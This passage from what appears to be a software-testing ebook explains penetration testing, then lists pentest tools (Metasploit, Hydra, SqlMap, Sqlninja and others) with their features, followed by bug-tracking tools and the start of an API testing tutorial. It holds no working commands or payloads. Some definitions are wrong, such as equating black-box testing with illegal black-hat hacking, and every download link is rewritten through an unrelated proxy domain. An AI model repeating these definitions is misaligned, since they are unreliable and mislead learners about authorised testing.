Management should have a proper risk management plan to avoid

security vulnerabilities in the system.
Passwords:
Passwords are there to avoid unauthorized access and secure your
personal data. Unsecured passwords (sharing with others, writing
them down somewhere, setting easy to guess) allows hackers to
guess your password easily.
Lack of training:
Lack of training leads to human errors. Human errors can be
prevented by giving proper training to the employees.
Human errors:
Human errors such as improper disposal of documents, coding errors,
giving out passwords to phishing sites are a significant source of
security vulnerabilities.
Communication:
Communication channels such as telephone, mobile, internet give
scope for security vulnerabilities.
Social:
Employees disclosing sensitive information with outsiders is one of the
common reasons for security threats.
What is the difference between Penetration Testing &

Vulnerability Scanning?
Before looking into the difference between penetration testing and
vulnerability scanning. Let’s see two most used terms such as
vulnerability and exploit.
What is a Vulnerability?
A vulnerability is a security weakness or flaw which can be exploited
by an attacker, to perform unauthorized actions within a system.
What Is An Exploit?
An exploit is a software program that takes advantage of a
vulnerability to cause unintended behavior to occur on a system. This
action is done to gain control of a system to attack it.
Now let’s see the difference between Penetration testing and

vulnerability assessment.
50
There is a confusion in the industry on the difference between

Penetration Testing & Vulnerability Scanning. Even though these two
terms are commonly interchanged but there are some differences
between these two terms. Penetration testing is not the same as the
vulnerability testing.
Vulnerability Scanning:
In vulnerability scanning (aka vulnerability assessment), we just
identify and report the vulnerability using vulnerability scanning tools.
It’s the first step to improve the security of a system.

A vulnerability assessment report should contain the title, the
description and the severity of a vulnerability.
Penetration Testing:
In Penetration testing (aka Pen test), we identify the vulnerabilities and
attempt to exploit them using penetration testing tools. We repeat the
same penetration tests until the system is negative to all those tests.
A penetration testing report lists the vulnerabilities that were exploited
successfully.
If an organization is interested in protecting their system from security

issues then they should carry out vulnerability assessment and
penetration testing on a regular basis.
Pen testing can be divided into three techniques such as manual

penetration testing, automated penetration testing and a combination
of both manual & automated penetration testing.
By using automated penetration testing tools, it is not possible to find

all vulnerabilities. Some vulnerabilities can be identified using a
manual scan. So, experienced pen testers use their experience and
skills to attack a system using manual penetration testing.
Who Performs Pen-testing?

Pen-testing can be performed by Testers or Network Specialists or
Security Consultants.
Role and Responsibilities of Penetration Testers:

Responsibilities of penetration testers vary from company to company.
However, there are several core responsibilities common to all pen
testers such as
51
• Understand complex computer systems and technical

cybersecurity terms
• Collect the required information from the organization to enable
penetration tests
• Plan and create penetration methods, scripts, and tests
• Carry out onsite testing of clients infrastructure and remote
testing of clients network to expose weaknesses in security
• Work with clients to determine their requirements from the test
• Conducts penetration testing and vulnerability scanning using
automated tools, ad-hoc tools, and manual testing
• Ability to analyze root causes and deliver strategic
recommendations during security reviews
• Create reports and recommendations from your findings
• Understand how the flaws that you identify could affect
business, or business function if they’re not fixed.
• The flaws that you identify should be reproducible so that it will
be easy for developers to fix them
• All the data and information should be kept confidential
Types of Penetration Testers?
1. Black hat penetration testers
2. White hat penetration testers
3. Grey hat penetration testers
What is the difference between Black, White and Grey
hat hackers?
Black Hat Hackers:
Black hat hackers (aka Black hats) are considered as cybercriminals.
They use their skills with an evil motive for personal or financial gains.
They break into computer networks to destroy data or make the
system unusable for those who are authorized to use the system.
Usually, they involve in hacking banks, stealing credit card
information, creating and using a botnet to perform DDoS (Distributed
Denial of Service) attacks etc.,
White Hat Hackers:

White hat hackers (aka White hats) are usually called ethical hackers.
Ethical hackers work for good reasons rather than evil. Usually,
companies recruit these white hat hackers as full-time employees and
also some companies work with these white hat hackers on contract
basis as security specialists to find security loopholes of their system.
White hat hackers attack a system after getting permission from the
owner of the system.
Grey Hat Hackers:

Grey hat hackers (aka Grey hats) may hack a system for ethical and
unethical reasons. Activities of these Grey hat hackers fall somewhere
52
between black hat hackers and white hat hackers. Grey hat hackers
find vulnerabilities in a system. This type of hacking is considered
illegal because they attack the system without getting permission from
the owner of the system. They find for the security vulnerabilities but
not for bad purposes. After finding security vulnerabilities, they report
them to the owner of the system. Sometimes they request a fee to fix
the issue. If the owner doesn’t respond then sometimes the hackers
will disclose the security flaw to the public.
What are the types of Penetration Tests?
Different types of Pen Testing which are as follows
1. Network Services Tests

Network services pen test aims to identify security weaknesses and
vulnerabilities in the network. These tests can be run both locally and
remotely.
Pen testers should target the following network areas
• Firewall config test

• Stateful analysis test
• Firewall bypass test
• IPS deception
• DNS level attacks such as Zone transfer testing, Switching or
routing issues, and another required network testing
Pen testers also cover some of the most common software packages
such as
• Secure Shell (SSH)
• SQL Server or MySQL
• Simple Mail Transfer Protocol (SMTP)
• File Transfer Protocol (FTP)
2. Web Application Tests
Web application pen tests (web application penetration testing) aim to
identify the security vulnerabilities of web applications, web browsers,
and their components like ActiveX, Applets, Silverlight and APIs.
3. Client Side Tests

Client-side pen tests aim to find security vulnerabilities and exploit
them in client-side software applications.
4. Wireless Tests
Wireless pen tests involved in analyzing the Wi-Fi networks and
wireless devices deployed on the client site. Wireless devices such as
laptops, netbooks, tablets, smartphones, iPods etc.,
5. Social Engineering Tests

53
Employees disclosing sensitive information with outsiders is one of the

common reasons of security threats. All the employees should follow
security standards and policies to avoid social engineering penetration
attempt. These tests are mostly done through communication
channels such as telephone, mobile, internet and it targets employees,
helpdesks and processes.
Social engineering pen tests can be subcategorized into two types
Remote Tests:
Remote tests intend to trick an employee to disclose sensitive
information via an electronic means (ie., via Phishing Email
Campaign)
Physical Tests:
Strong physical security methods should be applied to protect
sensitive information. It involves human handling tactics like
convincing an employee via phone calls. It is generally using in a
military facility.
What are the Types of Pen Testing?
There are three types of Pen Testing which can be used, which are as
follows
1. Black Box Penetration Testing

2. White Box Penetration Testing
3. Grey Box Penetration Testing
Black Box Penetration Testing

In Black Box Penetration Testing approach, black box pen testers
(Black Hat Hackers) assess the target system without having any
knowledge of system details. They just have high-level details about
the system such as URL or company name. They don’t examine any
programming code. These testers are not ethical hackers. It’s
impossible to gather information about the target system from the
owner of the system. So they launch an all-out, brute force attack
against the system to find out weaknesses or vulnerabilities in a
system. This approach is also referred as “trial and error” approach.
White Box Penetration Testing

In White Box Penetration Testing approach, white box pen testers
(White Hat Hackers) access the target system with complete details
about the system. Since they have complete details about the system,
white box test can be accomplished much quicker compared to black
box test. White box pen testers are called ethical hackers. This
54
approach is also known as clear box, glass box, open box and
structural testing.
Grey Box Penetration Testing

In Grey Box Penetration Testing approach, grey box pen testers (Grey
Hat Hackers) utilize both manual and automated testing processes. It
is a combination of both Black Box and White Box penetration testing
techniques. These hackers may attack a system for ethical and
unethical reasons. These hackers find vulnerabilities in a system. This
type of hacking is considered illegal because they attack the system
without getting permission from the owner of the system.
Limitations of Penetration Testing

Penetration testing cannot find all vulnerabilities in a target system.
There are some limitations based on the resources and restrictions of
a test, such as
• Limitations of skills of a pen tester – It’s hard to find professional

pen testes.
• Limitations of scope – most of the organizations leave some
tests due to a resource, security constraints etc.,
• Limitations of time
• Limitations of budget
• Limitations of tools used
Penetration Testing Tools:
Pen Testing Tools are classified into Vulnerability Scanners and
Vulnerability Attackers. Vulnerability Scanners show you the weak
spots of the system whereas Vulnerability Attackers show you the
weak spots of the system and attack them.
Free Penetration Testing Tools:
Some of the free penetration testing tools (network vulnerability
assessment tools/web vulnerability assessment tools)
are NMap, Nessus, Metasploit, Wireshark, OpenSSL, Cain &
Abel, W3af etc.,
Commercial Penetration Testing Tools:
Some of the commercial penetration testing tools are Pure
Hacking, Torrid Networks, SecPoint, Veracode etc.,
How to choose a Penetration Testing Tools?
We need to choose a penetration testing based on the following
points.
• It should be easy to use

• It should be easy to configure & deploy
• It should scan vulnerabilities easily
• Categorization of vulnerabilities based on the severity
55
• It should generate detailed reports and logs

• It should be cost-effective in terms of budget
• A good support team & technical documentation is essential
Conclusion:
We’ve prepared this tutorial by keeping software testers in mind and
covered everything needed for them to learn and implement
Penetration Testing at work. Even though it’s a beginner’s guide for
Penetration Testing, we hope you would be able to improve your
knowledge on Penetration Testing with this tutorial.
If you have any queries, please comment below. If you are a

penetration tester, please share your experience in the comment
section below.
Related posts:
• Most popular Penetration Testing tools/Pentest tools
• Security Testing – Detailed Guide
• Most popular Security Testing tools
• Test Management Tools
• Defect Tracking Tools
• API Testing Tools
• Automation Testing Tools
Top 15 Penetration Testing Tools

(Pen Testing Tools) in 2020
In this post, I am going to bring some best Penetration testing tools. I
am so excited to bring these popular pen testing tools before you.
Note: You should only use these Security Testing Tools to attack
an application that you have permission to test.
Here are some of the popular Penetration testing tools which are
popular among Pen Testers.
• 1. What is Penetration Testing

• 2. Metasploit
• 3. Wireshark
• 4. Spyse
• 5. NMap
• 6. Netsparker
• 7. Acunetix
• 8. w3af
• 9. Kali Linux
• 10. Nessus
• 11. Cain & Abel
56
• 12. Zed Attack Proxy

• 13. John The Ripper
• 14. THC Hydra
• 15. Burpsuite
• 16. SqlMap
• 17. Sqlninja
What is Penetration Testing?
Penetration testing is also a type of Security testing which is
performed to evaluate the security of the system (hardware, software,
networks or an information system environment). The goal of this
testing is to find all the security vulnerabilities that are present in an
application by evaluating the security of the system with malicious
techniques and to protect the data from the hackers and maintain
functionality of the system. It is a type of Non-functional testing which
intends to make authorized attempts to violate the security of the
system. It is also known as Pen Testing or Pen Test and the tester
who does this testing is a penetration tester aka ethical hacker.
Must Read: Penetration Testing – Complete Guide

We use penetration testing tools to find and exploit vulnerabilities in a
system. We know it’s difficult to build 100% secure systems but we
have to know what kind of security issues we are going to deal with.
There are many paid and free penetration testing tools available in the
market. Here, we discuss top 15 penetration testing tools.
Metasploit
Metasploit is a computer security project that provides the user with
important information about security vulnerabilities.
Metasploit framework is an open source penetration testing and

development platform that provides you with access to the latest
exploit code for various applications, operating systems, and
platforms.
It can be used on web applications, servers, networks etc. It has a

command-line and GUI clickable interface works on Windows, Linux,
and Apple Mac OS. It is a commercial product but it comes with a free
limited trial.
Metasploit Features:
Some of the features of Metasploit are as follows:
57
•It has a command-line and GUI interface

•It works on Linux, Windows & Mac OS X
• Network discovery
• Vulnerability scanner import
• Basic exploitation
• Module browser
• Manual exploitation
• Metasploit community edition is provided to the InfoSec
community free of charge
Download link: https://www.metasploit.com/
Wireshark
Wireshark is one of the freely available open source penetration
testing tools. Basically, it is a network protocol analyzer, it lets you
capture and interactively browse the traffic running on a computer
network. It runs on Windows, Linux, Unix, Mac OS, Solaris, FreeBSD,
NetBSD, and many others. It can be widely used by network
professionals, security experts, developers, and educators. The
information that is retrieved via Wireshark can be viewed through a
GUI or the TTY-mode TShark utility.
Wireshark Features:
Some of the features of Wireshark are as follows:
•Deep inspection of hundreds of protocols

•Live capture and offline analysis
• It runs on Windows, Linux, UNIX, macOS, Solaris, FreeBSD,
NetBSD, and many others
• Captured network data can be browsed via a GUI, or via the
TTY-mode TShark utility
• Rich VoIP analysis
• Read/write many different capture file formats
• Live data can be read from internet, PPP/HDLC, ATM, Blue-
tooth, USB, Token Ring, etc.,
• Coloring rules can be applied to the packet list for quick and
intuitive analysis
• Capture files compressed with gzip can be decompressed on
the fly
• Output can be exported to XML, PostScript, CSV or plain text
Download link: https://www.wireshark.org/
Spyse
A search engine that uses an OSINT mechanic (Open Source
Intelligent Tools) to collect, process, and provide structured
58
information about various elements of a network. All Spyse users are

able to perform a detailed search on the following network elements:
Spyse Features:
• Domains and subdomains
• IP addresses and subnets
• Encryption certificates
• Protocols
• Open ports
• WHOIS records
• Autonomous Systems (AS)
Website: https://spyse.com/
NMap
NMap is an abbreviation of Network Mapper. It is a free and open
source security scanning tool for network exploration and security
auditing. It works on Linux, Windows, Solaris, HP-UX, BSD variants
(including Mac OS), AmigaOS. It is used to determine what hosts are
available on the network, what services those hosts are offering, what
operating systems and versions they are running, what type of packet
filters/firewalls are in use etc., Many systems and network
administrators find it useful for routine tasks such as network
inventory, check for open ports, managing service upgrade schedules,
and monitoring host or service uptime. It comes with both command
line and GUI interfaces
NMap Port Scanning Tool features:

Some of the features of NMap are as follows:
•It discovers hosts on a network

•It identifies open ports on target hosts in preparation for auditing
• It is used to determine network inventory, network mapping,
maintenance and asset management
• To find and exploit vulnerabilities in a network
• It generates traffic to hosts on a network, response analysis and
response time measurement
Download link: https://nmap.org/
Netsparker
Netsparker is a web application security scanner. It is an automatic,
dead accurate and easy to use web application security scanner. It is
used to automatically identify security issues such as SQL injection
and Cross-Site Scripting (XSS) in websites, web applications, and web
59
services. It’s Proof-based Scanning technology doesn’t just report

vulnerabilities, it also produces a Proof of Concept to confirm they are
not false positives. So there is no point of wasting your time by
manually verifying the identified vulnerabilities after a scan is finished.
It is a commercial tool.
Netsparker Security Scanner Features:

Some of the features of Netsparker are as follows:
•Vulnerability assessment
•Advanced web scanning
• Proof-based scanning technology for dead-accurate
vulnerability detection and scan results
• Full HTML5 support
• Web services scanning
• HTTP request builder
• SDLC integration
• Reporting
• Exploitation
• Manual testing
• Anti-CSRF (Cross-site Request Forgery) token support
• Automatic detection of custom 404 error pages
• REST API support
• Anti-CSRF token support
Download link: https://www.netsparker.com
Acunetix
Acunetix is one of the leading web vulnerability scanners which
automatically scans any website. It detects over 4500 web
vulnerabilities which include all variants of SQL injection, XSS, XXE,
SSRF, and Host Header Injection. Its DeepScan Crawler scans
HTML5 websites and AJAX-heavy client-side SPAs. It allows users to
export discovered vulnerabilities to issue trackers such as Atlassian
JIRA, GitHub, Microsoft Team Foundation Server (TFS). It is available
on Windows, Linux, and Online.
It is a commercial tool.
Acunetix features:
Some of the features of Acunetix are as follows:
• In-depth crawl and analysis – automatically scans all websites

• A highest detect rate of vulnerabilities with low false positives
60
•Integrated vulnerability management – prioritize and control

threats
• Integration with popular WAFs and issue trackers such as JIRA,
GitHub, TFS
• Free network security scanning and Manual Testing tools
• Run on Windows, Linux and online
Download link: https://www.acunetix.com/
Read more: JIRA Interview Questions
w3af
W3af is a Web Application Attack and Audit Framework. It secures
web applications by finding and exploiting all web application
vulnerabilities. It identifies more than 200 vulnerabilities and reduces
your site’s overall risk exposure. It identifies vulnerabilities like SQL
injection, Cross-Site Scripting (XSS), Guessable Credentials,
Unhandled application errors, and PHP misconfigurations. It has both
a graphical and console user interface. It works on Windows, Linux,
and Mac OS.
W3af features:
Some of the features of W3af are as follows:
• Integration of web and proxy servers into the code

• Injecting payloads into almost every part of the HTTP request
• Proxy support
• HTTP Basic and Digest authentication
• UserAgent faking
• Add custom headers to requests
• Cookie handling
• HTTP response cache
• DNS cache
• File upload using multipart
It’s a free tool
Download link: http://w3af.org/
Kali Linux
Kali Linux is an open source pen testing tool which is maintained and
funded by Offensive Security Ltd. It supports only on Linux machines.
Kali contains more than 600 penetration testing tools which are geared
towards various information security tasks, such as Penetration
61
Testing, Security research, Computer Forensics, and Reverse

Engineering.
Kali Linux features:

Some of the features of Kali Linux are as follows:
•Full customization of Kali ISOs with live-build allowing us to

create our own Kali Linux images
• ISO of Doom and Other Kali Recipes
• Cloud version of Kali Linux can be set up easily in the Amazon
Elastic Compute Cloud
• It contains a bunch of Meta package collections which
aggregate different tool sets
• Full Disk Encryption (FDE)
• Accessibility features for visually impaired users
• Live USB with Multiple Persistence Stores
Download link: https://www.kali.org/
Nessus
Nessus is a vulnerability assessment solution for security practitioners
and it is created and managed by a company called Tenable Network
Security. It aids in identifying and fixing vulnerabilities such as
software flaws, missing patches, malware, and misconfigurations
across a variety of operating systems, devices and applications. It
supports Windows, Linux, Mac, Solaris etc.,
Nessus features:
Some of the features of Nessus are as follows:
•Reports can be easily customized to sort by vulnerability or

host, create an executive summary, or compare scan results to
highlight changes
• It detects both the remote flaws of the hosts that are on a
network and their missing patches and local flaws as well
• Identifies vulnerabilities that allow a remote attacker to access
sensitive information from the system
• Mobile device audits
• Configuration audits
Download link: http://www.tenable.com/products/nessus
Cain & Abel

Cain & Abel (often abbreviated to Cain) is a password recovery tool for
Microsoft Windows. It cracks encrypted passwords or network keys. It
62
recovers various kind of passwords using methods such as network

packet sniffing, cracking encrypted passwords by using methods such
as dictionary attacks, brute force and cryptanalysis attacks.
Cain & Abel features:
Some of the features of Cain & Abel Password Cracker or Password
Hacking tool are as follows:
•WEP (Wired Equivalent Privacy) cracking

• Ability to record VoIP conversations
• Decoding scrambled passwords
• Revealing password boxes
• Uncovering cached passwords
• Dumping protected storage passwords
Download link: http://cain-abel.en.softonic.com/download
Zed Attack Proxy

ZAP is a freely available open source web application security scanner
tool. It finds security vulnerabilities in web applications during
developing and testing phase. It provides automated scanners and a
set of tools that allow us to find security vulnerabilities manually. It is
designed to be used by both those new to application security as well
as professional penetration testers. It works on different operating
systems such as Windows, Linux, Mac OS X.
ZAP features:
Some of the features of ZAP automated penetration testing are as
follows:
• Intercepting proxy server

• Traditional and AJAX spiders
• Automated scanner
• Passive scanner
• Forced browsing
• Fuzzer
• Web Socket support
Download
link: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_P
roject
John The Ripper

John The Ripper (also known as JTR) is a free and open source
password cracking tool that is designed to crack even very
complicated passwords. It is one of the most popular password testing
and breaking programs. It is most commonly used to perform
63
dictionary attacks. It helps to identify weak password vulnerabilities in

a network. It also supports users from brute force and rainbow crack
attacks. It is available for UNIX, Windows, DOS, and OpenVMS. It
comes in a pro and free form.
Download link: http://www.openwall.com/john/
THC Hydra
THC-Hydra also called Hydra is one of the popular password cracking
tools. Another password cracker in line is THC Hydra. It supports both
GUI and Command Line user interface. It can decrypt passwords from
many protocols and applications with a dictionary attack. It performs
rapid dictionary attacks against more than 50 protocols including
cisco, telnet, ftp, http, https, mssql, mysql, svn etc., It is a fast and
stable network login hacking tool. This tool allows researchers and
security consultants to find unauthorized access.
Download link: https://github.com/vanhauser-thc/thc-hydra
Burpsuite
Burpsuite is a graphical tool for testing Web Application security. It is
developed by PortSwigger Web Security. It was developed to provide
a solution for web application security checks. It has three editions
such as community edition which is a free one, Professional edition,
and an enterprise edition. Community edition has significantly reduced
functionality. Burp proxy allows manual testers to intercept all requests
and responses between the browsers and the target application, even
when HTTPS is being used. In addition to basic functionality, such as
proxy server, scanner, and intruder, this tool also contains advanced
options such as a spider, repeater, decoder, comparer, sequencer,
extender API and clickbandit tool. It works on Windows, Mac OS X,
and Linux environments.
Download link: http://portswigger.net/burp/
SqlMap
Sqlmap is a free and open source penetration testing tool. It
automates the process of detecting and exploiting SQL injection
issues and hacking over of database servers. It comes with many
detection engines and many features for an ultimate penetration
tester. It comes with a command line interface. It runs on Linux,
Windows and Mac OS X.
64
SqlMap features:
Some of the features of SqlMap are as follows:
•Full support for database management systems such as

MySQL, Oracle, PostgreSQL, Microsoft SQL, Microsoft Access,
IBM DB2, SQLite, Sybase, SAP MaxDB, HSQLDB, H2, and
Informix.
• Full support for six SQL injection techniques such as boolean-
based blind, time-based blind, error-based, UNION query-
based, stacked queries and out-of-band.
• Support to direct connection to the database without passing via
a SQL injection
• Support to enumerate users, password hashes, privileges,
roles, databases, tables, and columns
• Automatic recognition of password hash formats and support for
cracking them using a dictionary-based attack
• Support to dump database tables entirely or specific columns as
per user’s choice
• Support to search for specific database names, tables or
columns across all databases’ tables
• Support to establish a TCP connection between the attacker
machine and the database server
Download link: http://sqlmap.org/
Sqlninja
Sqlninja is an open source penetration testing tool. The aim of this tool
is to exploit SQL injection vulnerabilities on a web application. It uses
Microsoft SQL Server as back end. It has a command-line interface. It
works on Linux, and Apple Mac OS X.
Sqlninja features:
Some of the features of Sqlninja are as follows:
• Fingerprinting of the remote SQL Server
• Direct and reverse shell, both for TCP and UDP
• Creation of a custom xp cmdshell if the original one has been
disabled
• Reverse scan in order to look for a port that can be used for a
reverse shell
• OS privilege escalation on the remote DB server
• Extraction of data from the remote DB
Download link: http://sqlninja.sourceforge.net
Some other Penetration Testing Tools are as follows:
65
There are a lot of hacking tools and softwares in the market. So we

are trying to include some other hacking tools in this list.
Aircrack-ng
Download link: https://www.aircrack-ng.org/
Arachni
Download link: http://www.arachni-scanner.com/
BeEF
Download link: https://beefproject.com/
NIKTO
Download link: https://github.com/sullo/nikto
Canvas
Download link: http://www.immunitysec.com
Social Engineer Toolkit
Download link: https://www.social-engineer.org
Ettercap
Download link: https://ettercap.github.io/ettercap/downloads.html
Veracode
Download link: http://www.veracode.com/demos
IBM AppScan
Download link: http://www-03.ibm.com/software/products/en/appscan
Nagios
Download link: http://www.nagios.org/
WebScarabNG
Download
link: http://www.owasp.org/index.php/Category:OWASP_WebScarab_
Project
Maltego
Download link: http://www.paterva.com/
IronWASP
Download link: http://ironwasp.org/
HconSTF
Download link: http://www.hcon.in/
OpenVAS
Download link: http://www.openvas.org/
Conclusion:
We tried our best to list popular Penetration Testing Tools (both Open
Source and Commercial). Let us know your favorite Penetration
testing tool in the comments below. If you feel I forgot to mention any
of your favorite tools, let us know in the comments below. We will try
to include it in our list and update this post.
66
17 Best Bug Tracking Tools

[DefectTracking Tools]
What is Bug Tracking Tool / What is
Defect Tracking Tool in Software
Testing?
Bug tracking tools in software testing are applications that help us to
record, report, and monitor the bugs in a software development
project.
Before looking into the popular defect tracking tools list, I would like to
raise some questions. Are you working in a company where excel
sheets are using to track the defects? I don’t say using excel is not a
good way of tracking bugs but why could not we try issue tracking
tools, when we have the best alternative open source tools. Everything
in an organization is related to ROI (return on investment). So, most of
the start-ups don’t invest in defect tracking tools and they simply use
excel sheets to move on. Are you using any tool for tracking bugs? Is
the tool you are using available in the below list else let us know the
tool which you are using and we will include it in our list.
Open Source Bug Tracking Tools

Open source bug tracking tools are available for free and these are
the alternatives to popular commercial bug tracking tools. It doesn’t
mean that all the open-source defect tracking tools are completely
free. Some open-source bug tracking systems bring added value to
their open-source one with their commercial project. Here in this
article, we are going to list some open source bug tracking systems
along with commercial defect tracking systems.
Most Popular Test Management Tools

You are a part of your organization. Why could not you suggest one
defect tracking tool to your team from the list below? A good tool helps
your team get organized and communicate effectively.
Also, it adds a feather on your hat by mentioning about defect tracking

tool in your interview process or preparation of a resume.
Earlier I have posted Sample Resume for Software Testers Freshers

and Experienced Professionals.
Don’t get confused with the terms defect and bug. Check this post to
get out of that chaos.
67
I always argue that just finding the bugs is not the job of a QA. A lot
more a QA can do. But one of our primary jobs is to find bugs in
software. 😉
Click here to find how to write a good bug report. Also, I recommend
you go through this post on the bug life cycle. It gives a clear idea of
how a bug goes through the life cycle to be fixed in SDLC.
List of Popular Defect Tracking Tools:
Here I am going to list the tools used for defect tracking contains both
free and commercial ones.
1. Bugzilla
2. HP ALM
3. JIRA
4. Mantis
5. Trac
6. Redmine
7. FogBugz
8. YouTrack
9. BugNet
10. Backlog
11. ReQtest
12. eTraxis
13. Zoho
14. Axosoft
15. Lighthouse
16. BugHost
17. Instabug
I am listing both free bug tracking tools and commercial bug tracking
tools. Commercial tools have free trails too. Using free trial you could
play around before choosing a commercial tool.
Now that you know of a list, let us take a look at each of them in detail.
BUGZILLA
Bugzilla is an open-source web-based bug tracking tool developed

by Mozilla. It is one of the leading bug tracking tools used by many
organizations.
68
It provides lots of features such as Advanced search capabilities,

Email notifications, Scheduled Reports (Daily, Weekly, Hourly, etc.) by
Email, Reports and Charts, Automatic Duplicate Bug Detection,
File/Modify Bugs By Email, Time Tracking, Request System, Private
Attachments and Comments and much more.
Type: Free
Click here to download
HP ALM
HP ALM is an application management solution to help you to define,

build, test, and deliver applications fast and with confidence across the
entire Software Development Life Cycle (SDLC). It’s a premium tool
and has a free trial.
Type: Commercial and free trial available

JIRA (developed by Atlassian)
According to Atlassian, JIRA defect tracking tool is used for issue

tracking and project management by over 50,000 customers.
Companies like Twitter, Nasa, Audi, The Telegraph, and much more
are using JIRA Software. Why still thinking, give a try. It is a
commercial tool and it provides a free trial.

Mantis
MantisBT is an open-source web-based issue tracking tool. It also

provides a mobile version. Users are able to get started in minutes to
manage their projects. Compatible with Chrome, Firefox, Safari,
Opera, and IE 7+. It has features like email notifications, chat, mobile
version, etc.,
69
Type: It has both Free & Commercial versions (You get 30 days free
trial on commercial plans too)
Trac
Trac is open-source, web-based project management, and issue

tracking tool. The features include project management, bug tracking,
the search engine for tickets, email notifications, etc.,
Type: Free (check @ official website)
Redmine
Redmine is open-source, web-based project management, and issue

tracking tool. Some of the main features of Redmine are multiple
projects support, flexible role-based access control, flexible issue
tracking system, Gantt chart, multi-language support, issue creation
via email, etc.,
Type: Free
FogBugz
FogBugz is a web-based project management and issue tracking tool.

It comes with features like a powerful search engine, issue tracking,
Agile project planning, project management, support help desk, time
tracking, discussion groups. Used by over 20,000 software
development teams.
Type: Commercial but you get free for 2 users (on demand). Check
the pricing page and confirm with the FogBugz support team if you
feel to use it.
YouTrack
70
YouTrack is a web-based bug tracking tool and project management

software developed by JetBrains. It allows you to install it on your
server. It includes features like Bug & Issue Tracking, Agile boards,
Reporting, Time Management.
Type: Free (Stand-alone installed on your server for 10 users) &

Commercial
BugNet
BugNET is a free, open-source issue tracking and project issue

management solution for the ASP.NET platform.
Type: Free
Backlog
It allows you to capture, track bugs, and seamlessly manage the end-
to-end development of your products. Teams can easily recognize
every bug in the workflow through this issue tracking tool. You can
easily integrate Backlog bug tracking tool with tools like Slack,
Jenkins, Google sheets importer, Email importer, iOS App, Android
App, Typetalk, Redmine, Jira Importer.

Download Backlog bug tracker
ReQtest
71
ReQtest offers a bug tracking module that allows developers & testers
to collaborate easily on fixing bugs. With ReQtest you can import all
your bug reports from a CSV file. You can automatically synchronize
ReQtest bugs with Jira issues. Also, you can easily integrate JIRA
projects with ReQtest projects.

Download ReQtest bug tracker
eTraxis
eTraxis is an OpenSource bug tracking tool with the ability to set up an

unlimited number of fully customizable workflows. “eTraxis” is an
acronym with initialism of “extensible tracking system”. eTraxis can be
used for tracking almost anything, but the most popular cases are a
bug tracker, a helpdesk, and even a CRM system.
Type: Open source

Download eTraxis bug tracker
Zoho
Zoho Bug Tracker is an online bug tracker and issue tracking software
that helps you to track and fix bugs quickly. You can easily integrate
the Zoho bug tracking tool with tools like Google, GitHub, Bitbucket,
Dropbox, Zoho Analytics, Zoho Desk, Zoho Books, Zapier.

Download Zoho bug tracker
Axosoft
Axosoft is a bug tracking system that allows you to use as on-

premises software or as a hosted software. It allows you to manage
your user stories, bugs, support tickets. Axosoft’s Card View is a fully
interactive kanban board that allows you to visualize item real-time
statuses and progress.
72

Download Axosoft bug tracker
Lighthouse
Lighthouse is a web-based issue tracking application. No matter

whether you’re a large company or a small bootstrapped team,
Lighthouse is the perfect ticket tracking solution to keep track of your
project development with ease. It also integrates with dozens of useful
services like Airbrake, Github, Exceptional, Beanstalk, etc.
Download Lighthouse
BugHost
BugHost is a fully-featured bug tracker designed to serve Enterprises,

SMEs who need high volume licensing in a reasonable price. It is easy
to categorize, report, and delegate bugs. It provides an end-to-end
solution designed for windows. It allows you to record unlimited
defects. Even your customers can directly post bugs to your project
and also it comes with strong security protection to access bugs.

Download BugHost
Instabug
Instabug is a bug reporting tool for mobile apps. It empowers mobile

teams to release with confidence through the comprehensive bug and
crash reports, in-app surveys, and real-time user feedback. You can
connect Jira with Instabug to provide your users and testers with an
easy way to share their feedback and report any bugs they find in your
app.

Download Instabug Bug Reporting Tool
Over To You:
73
I have just mentioned popular Issue Tracking tools here. If you are
using any other issue tracker tools which are not listed here. Please let
us know in the comments section.
I would like to conclude here. If you find any other defect tracking tools
so handy and useful, please comment below. Here I have hand-picked
a few posts which will help you to learn more about Software Testing.
API Testing | Learn API Testing |

API Testing Tutorial
In this API Testing post, we will learn the following
• 1. What is an API
• 2. What is API Testing
• 3. API Testing Types
• 4. Common tests on APIs
• 5. Advantages of API Testing
• 6. What exactly needs to be verified in API Testing
• 7. Tools used for API Testing
• 8. Difference between API testing and Unit Testing
• 9. Challenges in API testing
• 10. API Testing Best Practices
What is an API?
API is an acronym and it stands
for Application Programming Interface. API is a set of routines,
protocols, and tools for building Software Applications. APIs specify
how one software program should interact with other software
programs.
Routine: a program that performs a particular task. Routine is also
known as procedure, function, or subroutine.
Protocols: A format for transmitting data between two systems.
In simple words, API stands for Application Programming Interface.

API acts as an interface between two software applications and allows
the two software applications to communicate with each other. API is a
collection of software functions that can be executed by another
software program.
Let’s see some examples of an API in a more approachable way.
Assume an API as a Waiter at a Restaurant.

At a restaurant, you give an order based on the items available on the
menu. A waiter in the restaurant writes down your order and delivers it
to the kitchen who prepares your meal. Once the meal is ready, the
74
